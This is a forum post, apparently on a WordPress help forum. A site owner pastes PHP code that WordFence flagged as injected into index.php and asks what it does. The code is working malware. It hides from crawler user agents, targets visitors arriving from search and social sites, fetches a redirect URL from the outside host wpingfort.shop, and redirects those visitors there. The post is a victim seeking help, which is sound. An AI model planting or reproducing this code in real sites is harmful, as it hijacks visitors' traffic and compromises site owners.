WordFence reports “manipulated” index.php etc.

Hello.

WordFence reports different files as “manipulated” e.g. WordPress’ own index.php it is shown that this is the code added from someone different:

error_reporting(0); 
 	 	3	set_time_limit(0); 
 	 	4	$ref=$_SERVER['HTTP_REFERER']; 
 	 	5	$userhttp=$_SERVER["HTTP_USER_AGENT"]; 
 	 	6	$search='.aol.|.astronaut.at|.austronaut.at|.dastelefonbuch.de|.exalead.|.excite.|.sm.cn|.zoek.nl|1.cz|1881.no|2gis.ru|Keywords|Sozluk.com|abacho.|abcsolk.no|acoon.de|alexa.com|aliceadsl.fr|all.by|alltheweb.com|altavista.|amazon.com|apollo.lv/portal/search/|apollo7.de|apontador.com.br|arama.com|arcor.de|ariadna.elmundo.es|arianna.com|ask.|askkids.com|badoo.com|baidu.com|be-fr.altavista.com|be-nl.altavista.com|bebo.com|bing.com|bingj.com|blackplanet.com|blekko.com|blogdigger.com|blogpulse.com|blogs.icerocket.com|busca.orange.es|busca.uol.com.br|buscador.terra|buzznet.com|centrum.cz|cercato.it|charter.net|class.hit-parade.com|classmates.com|clusty.com|cnn.com|crawler.com|cuil.com|darkoogle.com|dasoertliche.de|delicious.com|digg.com|disq.us|disqus.com|dizionario.it.msn.com|dmoz.org|dogpile.com|donanimhaber.com|douban.com|duckduckgo.com|ecosia.org|eniro.se|eo.st|eu.ixquick.com|eurip.com|euroseek.com|everyclick.com|facebook.|fastweb.it|fb.me|find.tdc.dk|finderoo.com|fireball.de|firstsfind.com|fixsuche.de|flickr.com|flix.de|flixster.com|forestle.mobi|forestle.org|forums.whirlpool.net.au|fotolog.com|foursquare.com|fr2.rpmfind.net|francite.com|fresh-weather.com|friendfeed.com|friendsreunited.com|friendster.com|gaiaonline.com|gais.cs.ccu.edu.tw|geni.com|geona.net|getpocket.com|gigablast.com|github.com|global.cyworld.com|gnadenmeer.de|go.mail.ru|gomeo.com|google.|googleearth.|googleusercontent.com|goyellow.de|gulesider.no|habbo.com|hi5.com|highbeam.com|hit-parade.com|hledani.tiscali.cz|hocam.com|holmes.ge|hooseek.com|hotbot.com|hyves.nl|icq.com|identi.ca|ilse.nl|inbox.com|inci.sozlukspot.com|incisozluk.cc|incisozluk.com|incredimail.|infospace.com|instagram.|instela.com|itusozluk.com|ixquick.com|ixquick.de|jungle-spider.de|junglekey.|jyxo.1188.cz|kataweb.it|kununu.com|kvasir.no|lastfm.ru|latne.lv|lemoteur.|libero.it|link.2gis.ru|linkedin.com|listings.altavista.com|live.com|liveinternet.ru|livejournal.ru|lnkd.in|lo.st|looksmart.com|lycos.com|maailm.com|mail.ru|mamma.com|mamma75.mamma.com|marktplaats.nl|meinestadt.de|meta.rrzn.uni-hannover.de|meta.ua|metacrawler.|metager.de|metager2.de|mister-wong.|mixi.jp|moikrug.ru|monstercrawler.com|mozbot.|msnbc.msn.com|multiply.com|my.mail.ru|myheritage.com|mylife.ru|myspace.com|myyearbook.com|najdi.si|neti.ee|netlog.com|news.ycombinator.com|nigma.ru|nk.pl|nova.rambler.ru|odnoklassniki.ru|ok.ru|online.no|orkut.com|otsing.delfi.ee|paper.li|paperball.de|pesquisa.|pinterest.com|plaxo.com|plazoo.com|poisk.ru|pricerunner.co.uk|qbyrd.com|qualigo.|quark.sm.cn|quora.com|qwant.com|qzone.qq.com|reddit.com|renren.com|req.-hit-parade.com|rpmfind.net|search-dyn.tiscali.it|search-intl.netscape.com|search-results.com|search.|search1-1.free.fr|search1-2.free.fr|searchalot.com|searchatlas.centrum.cz|searchcanvas.com|searches.globososo.com|searchresults.verizon.com|searchthis.com|searchy.co.uk|serach.comcast.net|sharelook.fr|skynet.be|skyrock.com|sm.aport.ru|smart.delfi.lv|so.360.cn|so.com|so.m.sm.cn|sonico.com|soso.com|sosodesktop.com|sougou.com|sourceforge.net|sourtimes.org|stackoverflow.com|start.facemoods.com|start.iplay.com|startsiden.no|studivz.net|stumbleupon.com|suche.aolsvc.de|suche.freenet.de|suche.gmx.net|suche.info|suche.web.de|suchmaschine.com|suchnase.de|szukaj.onet.pl|szukaj.wp.pl|t-online.de|t.umblr.com|tagged.com|talktalk.co.uk|taringa.net|technorati.com|teoma.com|tixuma.de|toile.com|toolbarhome.com|trouvez.com|trovarapido.com|tuenti.com|tumblr.com|twingly.com|twitter.com|uludagsozluk.com|ulusozluk.com|url.org|us.ixquick.com|verden.abcsok.no|viadeo.com|vimeo.com|vinden.nl|vindex.nl|virgilio.it|vk.com|vkontakte.ru|vkrugudruzei.ru|vshare.toolbarhome.com|walhello.|wayn.com|web.canoe.ca|web.gougou.com|web.nl|web.skype.com|web.toile.com|web.volny.cz|web.whatsapp.com|webcrawler.com|webfetch.com|weborama.com|weeworld.com|weibo.com|witch.de|x-recherche.com|xanga.com|xing.com|yahoo.|yandex.|yasni.|yatedo.|yougoo.fr|youtu.be|youtube.com|ys.mirostart.com|yz.m.sm.cn|zapmeta.|zhongsou.com|zoeken.nl|zoohoo.cz'; 
 	 	7	$b1223='Abonti|aggregator|AhrefsBot|Aport|asterias|Baiduspider|bingbot|binance|BackupLand|Barkrowler|BDCbot|Birubot|BLEXBot|BUbiNG|BuiltBotTough|Bullseye|BunnySlippers|Butterfly|CamontSpider|CCBot|Cegbfeieh|CheeseBot|CherryPicker|coccoc|CopyRightCheck|cosmos|crawler|Crescent|CyotekWebCopy|CyotekHTTP|DataForSeoBot|DeuSu|discobot|DittoSpyder|DnyzBot|DomainCrawler|DotBot|DownloadNinja|dcrawl|EasouSpider|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|Exabot|ExtractorPro|Ezooms|facebookexternalhit|FairShare|Fasterfox|FeedBooster|Foobot|Genieo|GetIntentCrawler|Gigabot|GrapeshotCrawler|Go-http-client|Harvest|hloader|HTTrack|humanlinks|HybridBot|ieautodiscovery|Incutio|InfoNaviRobot|InternetSeer|ips-agent|IstellaBot|JamesBOT|JennyBot|JS-Kit|Jooblebot|k2spider|Kenjin|kmSearchBot|larbin|LexiBot|Linguee|LinkExchanger|LinkextractorPro|linko|LinkWalker|LinkpadBot|lmspider|LNSpiderguy|ltx71|lwp-trivial|Mail.RU_Bot|magpie|MataHari|MaxPointCrawler|MegaIndex|memoryBot|MIIxpc|Mippin|MisterPiX|MJ12bot|MLBot|moget|MSIECrawler|msnbot|msnbot-media|NetAnts|NetcraftSurveyAgent|NICErsPRO|NjuiceBot|NPBot|Nutch|OfflineExplorer|OLEcrawler|Openfind|openstat.ru|panscient|PostRank|PetalBot|ProWebWalker|ptd-crawler|Purebot|PycURL|QueryNMetasearch|RepoMonkey|Riddler|RMA|Scrapy|SemrushBot|serf|SeznamBot|SISTRIX|SiteBot|SiteSnagger|Serpstat|Slurp|SnapPreviewBot|Sogou|Soup|SpankBot|spanner|spbot|Spinn3r|SpyFu|statdom.ru|SputnikBot|suggybot|SurveyBot|suzuran|Teleport|Telesoft|TheIntraformant|TheNomad|TightTwatBot|Titan|True_Robot|ttCrawler|turingos|TurnitinBot|TOBBOT|UbiCrawler|UnisterBot|URLyWarning|VCI|Vedma|Voyager|WBSearchBot|WebAuto|WebBandit|WebDataStats|WebCopier|WebEnhancer|WebmasterWorldForumBot|WebReaper|webprosbot|WebSauger|WebStripper|WebZip|Wotbox|YottosBot|Yeti|YandexFavicons|Zao|Zeus|ZyBORG|python\-requests|ALittle\ Client|Apache\-HttpClient'; 
 	 	8	$start=true; 
 	 	9	$dearchg=false; 
 	 	10	$oct=explode('|',$b1223); 
 	 	11	foreach($oct as $vald){if(strpos($userhttp,$vald) !== FALSE){setcookie('GA_r',1,time()+259200,'/');$start=false;break;}}; 
 	 	12	$oct=explode('|',$search); 
 	 	13	foreach($oct as $vald){if(strpos($ref,$vald) !== FALSE){$dearchg=true;break;}}; 
 	 	14	if(!$_COOKIE["GA_r"] && $start === true && $dearchg === true){ 
 	 	15	   $filename = md5("index.php"); 
 	 	16	   $path = dirname(__FILE__); 
 	 	17	   if(file_exists($path."/".$filename)) { 
 	 	18	       $timer = filemtime($path."/".$filename); 
 	 	19	   } else { 
 	 	20	       $timer = time()-130; 
 	 	21	   } 
 	 	22	   $res = ''; 
 	 	23	   if(time()-120 >= $timer){ 
 	 	24	       if(function_exists('curl_version')){ 
 	 	25	           $curl = curl_init(); 
 	 	26	           curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 
 	 	27	           curl_setopt($curl, CURLOPT_URL, 'http://wpingfort.shop/'); 
 	 	28	           curl_setopt($curl, CURLOPT_TIMEOUT, 6); 
 	 	29	           $res = curl_exec($curl); 
 	 	30	           curl_close($curl); 
 	 	31	       } 
 	 	32	       if($res == ''){ 
 	 	33	           $res = file_get_contents('http://wpingfort.shop/'); 
 	 	34	       } 
 	 	35	       file_put_contents($path."/".$filename, $res); 
 	 	36	   } else { 
 	 	37	       $res = file_get_contents($path."/".$filename); 
 	 	38	   } 
 	 	39	   setcookie('GA_r' , 1, time() + 259200, '/'); 
 	 	40	   header('Location: '. $res); 
 	 	41	   exit; 
 	 	42	} 

I don’t what this means but it seems that wpingfort.shop is shown on our URL, which is quite different. OR is this the “real” content of index.php and how do I find out by what this is caused?